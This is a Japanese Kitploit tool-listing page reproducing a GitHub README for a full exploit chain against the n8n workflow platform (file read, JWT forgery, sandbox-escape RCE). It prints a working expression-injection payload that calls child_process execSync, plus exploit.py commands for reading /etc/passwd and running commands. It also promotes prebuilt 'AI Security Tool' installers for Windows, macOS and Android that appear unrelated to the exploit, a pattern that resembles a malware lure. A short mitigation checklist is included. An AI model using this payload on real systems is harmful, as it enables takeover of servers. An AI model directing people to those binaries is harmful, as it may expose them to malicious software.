Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-21858-n8n-FullChain — 🛡️ CVE-2026-21858 + CVE-2025-68613 対応の公式 AI セキュリティツールモジュール(n8n「Ni8mare」未認証任意ファイル読み取り & 式インジェクション RCE フルチェーン)。 | Kitploit
ツール/GitHubGitHub/zerodayevil/cve-2026-21858-n8n-fullchain
脆弱性スキャナー脆弱性分析エクスプロイトウェブアプリケーション悪用ポストエクスプロイトウェブセキュリティペネトレーションテストレッドチーミングペイロード開発
AIセキュリティ
GitHubzerodayevil/cve-2026-21858-n8n-fullchain

CVE-2026-21858-n8n-FullChain

🛡️ CVE-2026-21858 + CVE-2025-68613 対応の公式 AI セキュリティツールモジュール(n8n「Ni8mare」未認証任意ファイル読み取り & 式インジェクション RCE フルチェーン)。

リポジトリを見る
14時間10分前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

🛡️ AI Security Tool モジュール
n8n フルチェーン (CVE-2026-21858 + CVE-2025-68613) — 「Ni8mare」

AI Security Tool エコシステム向け公式セキュリティ監査モジュール


Latest Release Build Status Donations Telegram Channel

License

🌐 Web デモ • 📚 プロジェクトサイト • 💬 コミュニティチャット

ウェブサイトナビゲーション: ホーム • アップデート • ダウンロード • モジュール

AI Security Tool Banner


🧠 概念の概要

本モジュールは、n8n ワークフロー自動化インスタンスに対する診断ツールと完全なエクスプロイトチェーンを提供します。これは Ni8mare と呼ばれています。

この攻撃チェーンは、Content-Type の混同によって引き起こされる未認証の任意ファイル読み取り (CVE-2026-21858) と、認証済みの式インジェクションによるサンドボックスバイパス (CVE-2025-68613) を組み合わせたものです。公開されたファイルアップロードフォームに対して細工された Content-Type: application/json リクエストを送信することで、攻撃者は filepath 引数を制御し、内部システムファイル (/proc/self/environ、設定ファイル、SQLite DB) を読み取ることができます。取得した encryptionKey とパスワードハッシュにより、管理者 JWT Cookie をオフラインで偽造することが可能になります。認証後、this.process.mainModule.require を介した式インジェクションにより JavaScript サンドボックスを脱出し、任意のシステムコマンドを実行できます。

🎯 中核となる影響の考え方

「ファイル読み取りからシステム全体の乗っ取りまで、わずか3ステップ。」
ファイル読み取りにはバイナリ出力を伴うアクティブなフォームワークフローが必要ですが、式インジェクションは特別なノードや明示的なシステム権限を必要とせず、デフォルトの n8n インストールで確実に機能します。

📊 脆弱性の仕様

仕様割り当て値備考
CVE 識別子CVE-2026-21858 + CVE-2025-68613フルチェーン: 未認証ファイル読み取りから RCE まで
深刻度評価Critical (CVSS v3.1: 10.0 + 9.9)未認証 RCE チェーン
脆弱性の種類CWE-200 / CWE-94Content-Type 混同 / コードインジェクション
影響を受けるコンポーネントn8n ワークフロー自動化エンジンバージョン <= 1.65.0 (AFR) / >= 0.211.0 (RCE)
修正済みバージョン1.121.0 (AFR) / 1.120.4+ (RCE)ベンダーによる公式パッチがリリース済み
必要な権限なし公開フォームを介した未認証の初期アクセス

🕸 攻撃シナリオとアーキテクチャ

root@kitploit:~
graph TD
    A[Unauthenticated Attacker] -->|1. Content-Type Confusion| B[Vulnerable Form Endpoint]
    B -->|2. Arbitrary File Read| C[Extract /proc/self/environ & database.sqlite]
    C -->|3. Derive Secret & Hash| D[Forge Admin JWT Cookie]
    D -->|4. Authenticate as Admin| E[n8n Workflow Engine]
    E -->|5. Expression Injection Payload| F[Sandbox Escape via mainModule.require]
    F -->|6. Execute Command| G[Full Remote Code Execution]

💻 式インジェクションのペイロード

root@kitploit:~
={{ (function() {
  var require = this.process.mainModule.require;
  var execSync = require("child_process").execSync;
  return execSync("id").toString();
})() }}

🛡 緩和策チェックリスト

  • 🟢 直ちにアップグレード: n8n インスタンスをバージョン 1.121.0 以上に更新してください。
  • 🟢 ワークフロートリガーの制限: 公開された未認証のフォームワークフローを無効化するか、厳格なファイル検証を実施してください。
  • 🟡 実行制限の設定: N8N_ENFORCE_SETTINGS_FILE_PERMISSIONS=true を設定し、Docker コンテナ内のプロセス権限を制限してください。

💻 このモジュールの実行方法

⚠️ 重要: 本モジュールは、AI Security Tool エコシステム内での安全な実行と診断のために特別に構築されています。常に公式リポジトリから取得した検証済みのモジュールを使用してください。

1️⃣ AI Security Tool のインストール

監視および診断スクリプトを実行するには、AI Security Tool コアエンジンがインストールされていることを確認してください:

OS / プラットフォームバージョンアーキテクチャ / 形式リリース日ステータスダウンロードリンク
🪟 Windowsv6.3.20x64 インストーラー (.exe)2026-09-08🟢 最新.exe をダウンロード
🪟 Windowsv6.3.20x64 ポータブル (.tar.gz)2026-09-08🟢 最新.tar.gz をダウンロード
🍏 macOSv5.3.29Apple Silicon M1/M2/M3 (.dmg)2026-09-05🟢 安定版.dmg をダウンロード
🐧 Linuxv5.3.27ユニバーサル x64 (.tar.gz)2026-09-01🟢 安定版.tar.gz をダウンロード
🤖 Androidv8a 5.3.27ARM64 APK (.apk)2026-09-01🟢 安定版.apk をダウンロード

2️⃣ コンソールでの実行

root@kitploit:~
# Read arbitrary file via diagnostic module
uv run python exploit.py http://localhost:5678 /form/vulnerable-form --read /etc/passwd

Execute full attack chain with custom command

uv run python exploit.py http://localhost:5678 /form/vulnerable-form --cmd "id"


🔍 セキュリティ監査モジュール & PoC リポジトリ

コミュニティによって維持されている脆弱性スキャナモジュール、PoC スクリプト、研究リポジトリ:

🔥 リモートコード実行 (RCE) & ネットワーク脆弱性 5 モジュール
  • CVE-2026-21858 — n8n フルチェーン未認証 RCE (Ni8mare) @ZeroDayEvil
  • CVE-2026-41089 — Netlogon リモートコード実行エクスプロイト @ZeroDayEvil
  • CVE-2026-20805 — Windows リモートコード実行 Proof-of-Concept @ZeroDayEvil
  • CVE-2026-41096 — 重大な RCE 脆弱性スキャナモジュール @ZeroDayEvil
  • CVE-2026-24291 — ネットワークプロトコル リモートコード実行 @ZeroDayVPN
🛡️ 特権昇格 (EoP) & サービス 3 モジュール
  • CVE-2026-54121 — AD CS Certighost ドメインコントローラーなりすまし @ZeroDayEvil
  • CVE-2026-66804 — CrossDevice サービス特権昇格 @ZeroDayVPN
  • CVE-2026-50416 — ローカル特権昇格 Writeup & PoC @ZeroDayEvil
📚 脆弱性研究 & Writeup 2 モジュール
  • CVE-2026-42978 — 詳細な技術分析 & PoC 研究 @ZeroDayEvil
  • CVE-2026-83991 — 完全な WriteUp & エクスプロイト実演 @ZeroDayVPN

⚖️ ライセンス & 法的免責事項

🚨 免責事項

このツールおよび技術分析は、許可されたシステム監査、研究、およびペネトレーションテストのために厳密に提供されています。
許可されていないターゲットに対してエクスプロイトチェーンを実行することは違法です。作者は、不正アクセス、データ損失、またはシステム障害に対して一切の責任を負いません。許可された範囲内でのみ操作してください。

🔄 コントリビューション & コミュニティ

セキュリティ研究コミュニティからのコントリビューションを歓迎します! 主なコントリビューション分野:

  1. AI 統合: 新しい LLM プロバイダーの追加と専門的なセキュリティエージェントの開発。
  2. セキュリティツール: 脆弱性モジュールの開発と CLI スキャナの統合。
  3. 最適化: パーサー速度、実行の安全性、キャッシュロジックの強化。
  4. ドキュメント: 研究論文、ガイド、およびローカライズされた翻訳の作成。

🔗 お問い合わせ & サポート

  • 公式ウェブサイト: ZeroDayEvil.com
  • オリジナル研究: Cyera Ni8mare Write-up
  • Telegram 管理者: @ZeroDayEvil
  • Telegram チャット: @ZeroDyaTool_chat
  • Telegram チャンネル: @ZeroDyaTool_channel
  • プロジェクトのスポンサー: PayPal 寄付
  • Open Collective: opencollective.com/ZeroDayEvil

AI Security Tool — サイバーセキュリティ専門家のためのターミナルワークフローと自動化を再構築する。

ツールをダウンロード